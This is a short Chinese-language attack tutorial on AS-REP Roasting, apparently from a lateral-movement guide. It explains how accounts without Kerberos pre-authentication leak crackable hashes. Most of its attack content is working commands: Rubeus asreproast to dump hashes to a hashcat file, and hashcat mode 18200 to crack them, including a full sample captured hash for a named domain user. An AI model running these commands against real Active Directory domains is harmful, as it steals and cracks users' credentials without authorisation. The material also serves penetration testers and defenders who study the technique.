AS-REP Roasting

这是一种针对kerberos协议的攻击技术,不需要认证就可以获取到用户的密码hash值。如果用户开启了“不使用Kerberos预认证”,攻击者就可以获取到Kerberos AS-REP,经过用户的RC4-HMAC密码加密过的,然后他就可以离线破解这个凭证了。
身份预认证是kerberos认证的第一步,通常是由KDC认证服务器来管理,目的是为了防止暴力破解攻击。

条件

  1. 系统默认是没有开启”不要求Kerberos预身份验证”

横向移动-AS-REP Roasting - 图1

  1. 有台主机可以与KDC进行通信的主机

    实战示例

    工具:https://github.com/GhostPack/Rubeus

运行下列的命令,会得到账户的hash值,这个key值用于加密时间戳。可以吧这个值保存下来进行离线暴力破解。

  1. Rubeus.exe asreproast
  2. 导出TXT
  3. .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

横向移动-AS-REP Roasting - 图2

可以看到请求的过程中看到了发起的数据包横向移动-AS-REP Roasting - 图3

通过hashcat进行暴力破解

  1. .\hashcat.exe -m 18200 .\hashes.txt pass.txt --force
  2. 也可以直接写入
  3. hashcat -m 18200 '$krb5asrep$23$win10_2@ring2.com:9b93f475d1348bc80d8826e558f94e39$d335c24cb5343d505cd0fd59cadf290c3a2af20dbdad28f8671dd6d82ba760e2de0cc29b0b6bc222bd1833b5d6d8bb6c2b1d3b5203ecadc6d305a5597949d4d60ac9a286c214af6be85596a7054b3a50664d489ef3fe72c397bb67fcc90225acb10637357c1408752b5e10d492a752bf0dbd18ed09f0b19962186a49ab98d30935983cbc20133597bdca32c8a1a71e60b098cc47a511f5f1d6c309205b0f76cfce6a3167b1481b2ec868bf48bb99ec23b42b942867cd0952833eb71f733d305ab9f50cb88d76eafd95619a75977c7bcb52bb31e0331239c2faee1dfb0da84d902d882d9a642b' password.txt --force

横向移动-AS-REP Roasting - 图4